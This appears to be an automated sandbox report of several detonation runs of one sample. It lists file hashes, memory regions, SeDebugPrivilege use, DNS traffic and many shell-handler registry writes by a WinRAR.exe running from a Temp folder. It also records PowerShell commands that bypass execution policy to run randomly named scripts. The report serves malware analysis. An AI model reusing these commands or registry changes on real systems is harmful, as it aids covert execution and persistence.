memory/3088-5-0x0000000005BF0000-0x0000000005C56000-memory.dmp
memory/3088-6-0x0000000005C60000-0x0000000005CC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0cslch0.n3i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3088-16-0x0000000005CD0000-0x0000000006024000-memory.dmp
memory/3088-17-0x0000000006210000-0x000000000622E000-memory.dmp
memory/3088-18-0x0000000006310000-0x000000000635C000-memory.dmp
memory/3088-19-0x0000000002940000-0x0000000002950000-memory.dmp
memory/3088-20-0x00000000072D0000-0x0000000007366000-memory.dmp
memory/3088-21-0x00000000067C0000-0x00000000067DA000-memory.dmp
memory/3088-22-0x0000000006810000-0x0000000006832000-memory.dmp
memory/3088-23-0x0000000007920000-0x0000000007EC4000-memory.dmp
memory/3088-24-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/3088-25-0x0000000002940000-0x0000000002950000-memory.dmp
memory/940-26-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/940-27-0x0000000000CF0000-0x0000000000D00000-memory.dmp
memory/3088-29-0x0000000002940000-0x0000000002950000-memory.dmp
memory/940-28-0x0000000000CF0000-0x0000000000D00000-memory.dmp
memory/940-39-0x0000000000CF0000-0x0000000000D00000-memory.dmp
memory/940-40-0x000000007F5F0000-0x000000007F600000-memory.dmp
memory/940-41-0x0000000006050000-0x0000000006082000-memory.dmp
memory/940-42-0x00000000702E0000-0x000000007032C000-memory.dmp
memory/940-52-0x0000000006030000-0x000000000604E000-memory.dmp
memory/940-53-0x0000000006C70000-0x0000000006D13000-memory.dmp
memory/940-54-0x0000000007400000-0x0000000007A7A000-memory.dmp
memory/940-55-0x00000000047B0000-0x00000000047BA000-memory.dmp
memory/940-56-0x0000000006FD0000-0x0000000006FE1000-memory.dmp
memory/940-57-0x0000000007000000-0x000000000700E000-memory.dmp
memory/940-58-0x0000000007010000-0x0000000007024000-memory.dmp
memory/940-59-0x0000000007050000-0x000000000706A000-memory.dmp
memory/940-60-0x0000000007040000-0x0000000007048000-memory.dmp
memory/940-64-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/3088-65-0x0000000002940000-0x0000000002950000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6cef6d154330ef08cec5d61caae87c59 |
| SHA1 | 3a7a52d713bfb75e03834ecebf80a3dbba5aa69e |
| SHA256 | d34857415540862d8fcae632c93891b93fe5539e23b13365a05742b4c2ed7085 |
| SHA512 | 7538ddd1cbd0a0608dd52379facff2b0818cd04dddd0188bd311737383370f756c3ef26e1501c3dd70e9dbb11cebe4c3d798eef4663f4388205233171326418c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/3088-69-0x00000000739A0000-0x0000000074150000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
140s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
Network
Files
memory/2976-4-0x000000001B390000-0x000000001B672000-memory.dmp
memory/2976-5-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
memory/2976-7-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-6-0x00000000020D0000-0x00000000020D8000-memory.dmp
memory/2976-8-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
memory/2976-9-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-10-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-11-0x0000000002620000-0x00000000026A0000-memory.dmp
memory/2976-12-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
156s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x394
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/3636-0-0x000001DB64980000-0x000001DB649A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5oqynet5.bwo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3636-10-0x00007FFA254B0000-0x00007FFA25F71000-memory.dmp
memory/3636-11-0x000001DB62890000-0x000001DB628A0000-memory.dmp
memory/3636-12-0x000001DB62890000-0x000001DB628A0000-memory.dmp
memory/3636-15-0x00007FFA254B0000-0x00007FFA25F71000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
145s
Max time network
156s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4916 -ip 4916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 3140
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
109s
Max time network
165s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5060 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/2408-0-0x0000000000400000-0x00000000008F2000-memory.dmp